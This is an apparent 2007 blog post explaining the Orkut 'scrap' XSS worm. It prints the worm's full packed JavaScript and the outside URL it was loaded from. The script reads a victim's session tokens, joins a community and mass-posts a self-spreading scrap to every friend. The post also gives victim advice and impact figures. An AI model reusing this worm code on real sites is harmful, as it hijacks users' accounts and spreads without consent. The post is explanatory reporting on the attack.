Microsoft Anti Virus

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Tuesday, 18 December 2007

Orkut XSS attack - that "2008 vem ai... que ele comece mto bem para vc" thingie

Posted on 20:04 by Unknown


Orkut XSS Attack - "2008 vem ai... que ele comece mto bem para vc" thing





A lot of you have probably been wondering how you received a scrap saying " 2008 vem ai... que ele comece mto bem para vc" from me or possibly from some friend of yours.



Its called xss attack or cross site scripting attack. A piece of javascript code(on clients side that is your browser) gets executed, when you receive a scrap from your friends id(obviously after his orkut session is infected with the malicious code) with the spam message and started scrapping everyone. This happens when you log into your orkut scrapbook to read the malicious scrap.

When someone sends you a spam scrap and you read that the same scrap is sent to your friends from your account. This will spread for the coming few days possibly till orkut takes some measures.

Steps you can take:

If possible change your gmail account password and do not login to orkut till they sort this out.



Courtesy: Antrix.net(find link in comments)

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {

e=function(c) {

   return(c35?String.fromCharCode(c+29):c.toString(36))

};

if(!''.replace(/^/,String)){

   while(c--){d[e(c)]=k[c]||e(c)}

   k=[function(e){return d[e]}];

   e=function(){return'\\w+'};

   c=1

};

while(c--){

   if(k[c]){

       p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])

   }

}

return p

};

setTimeout(

$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}

L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};

7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+

(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");

8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1)

{h=l.S(A);6(h!=0){b 2h}}16{h+=2};

5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};

7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")

+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};

7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7()

{6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");

t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0))

;f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};

3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();

3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);

3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);

3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};

7 V(){6(j==8.18("N").M){b};

5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>

[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\'); r.1o=" 1c="\\" 1e="\\">";

5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();

3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");

3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};

6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();

',62,150,'|||xml||var|if|function|document|domain|send|

return|path|wDate||select|name|begin|new|index|

www|dc|expires|encodeURIComponent|http|com|POST|script|

wormdoorkut|div|end|getCookie|orkut||cookie|aspx

|prefix|createXMLHttpRequest|true|getElementsByTagName|S

IG|Date|loadFriends|POST_TOKEN|scrapText|null|

signature|catch|length|selectedList|item|value|application|

open|indexOf|cmm_join|secure|sendScrap|setCookie|

readyState|onreadystatechange|try|Content|86400

|setRequestHeader|embed|ActiveXObject|Action|else|form|

getElementById|escape|status|urlencoded|200|setTime

|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|

createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|

GMT|go|GET|Compose|width|innerHTML|height|option|

setAttribute|id|submit|style|display|none|removeChild

|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|

history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|

raw|LoL|Msxml2|type|Microsoft|shockwave|flash|

wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera

|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1

);

author="Rodrigo Lacerda"



The orkut website is built on asp.net,

if you wish to read the technical side

of preventing xss attacks in asp.net go here 



Update:

1.) The problem seems to have sorted out by orkut in

2 days(thats long)

2.) 400,000 users affected.

3.) Top users affected by country

US, Germany, India, Brazil

4.) Orkut has still not accepted it was

a mistake from their side.The official orkut blog

is still mum on the incidence.

5.) Your password is safe, though it was possible

to hack your gmail password if say the virus

redirected to you to a page which looked

exactly like orkut and asked you to relogin.



A

Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in Google, Internet, Observations, Rumours | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Google Reveals How Much Percentage Of Revenue It Shares With Adsense Publishers
    Google recently revealed on a blog post on its adsense blog, what percentage of revenue it shares with its adsense partners. According to th...
  • Greed Plus Dumbness Equals Scam Victim
    Recently someone asked me if a email they received informing them of the lottery they have won in UK was real and they should reply. I mean ...
  • mGinger Mobile Ad Network Review
    MGinger Social Adnetwork There has been a lot of buzz on the internet specially the social networking sites like Orkut about mGinger , its ...
  • When Capitalism Isn't "That Capitalistic" But Socialism Still Sucks
    Wikipedia Mentions Capitalism as: "Capitalism  is the  economic system  in which the  means of production  are owned by  private   pers...
  • Conficker Worm Removal: If You Cannot Open Anti Virus Sites & Microsoft Sites
    Conficker Worm changes your host file (if you don't know what it is, don't worry or search Google) in a way that you cannot visit an...
  • Long story short!
    A little bird was flying in winter. The bird froze and fell to ground. A cow came and dropped some dung on it. Bird began to realise how war...
  • When Should Technology "Must" Be Free/Open Source/Open Standard?
    I have pondered about this questions a lot, for years maybe & still i don't really know the answer. Technology business is so full o...
  • CreepBook - When Its Time To Say "Enough"
    "Privacy" - its a joke. Or it has been made into one. Every website has it though, most have i hidden or less prominent. Try this ...
  • 1 - 2 - 3
    1 - 2 - 3 are special numbers. For some reason in every sport, the first 3 people are awarded a medal.  Ofcourse 1 is the best place to be t...
  • Read This Now!
    How often have you come across emails and inspirational quotes which say rules to live by or lessons learnt in life ? Somehow all that lect...

Categories

  • Anthropology
  • Blogging
  • Blogs
  • Business
  • Economics
  • Finance
  • Fun
  • Future
  • Google
  • GTD
  • Humor
  • Inspiration
  • Internet
  • News
  • Observations
  • Online Advertising
  • Personal Development
  • Politics
  • Pop Culture
  • Productivity
  • Research
  • Rumours
  • Self Growth
  • Sports
  • Technology News
  • Weird Stuff

Blog Archive

  • ►  2010 (1)
    • ►  May (1)
  • ►  2009 (14)
    • ►  July (1)
    • ►  June (8)
    • ►  February (1)
    • ►  January (4)
  • ►  2008 (38)
    • ►  November (3)
    • ►  October (26)
    • ►  September (6)
    • ►  May (2)
    • ►  March (1)
  • ▼  2007 (5)
    • ▼  December (1)
      • Orkut XSS attack - that "2008 vem ai... que ele co...
    • ►  October (2)
    • ►  May (1)
    • ►  April (1)
  • ►  2005 (10)
    • ►  December (1)
    • ►  October (3)
    • ►  September (6)
Powered by Blogger.

About Me

Unknown
View my complete profile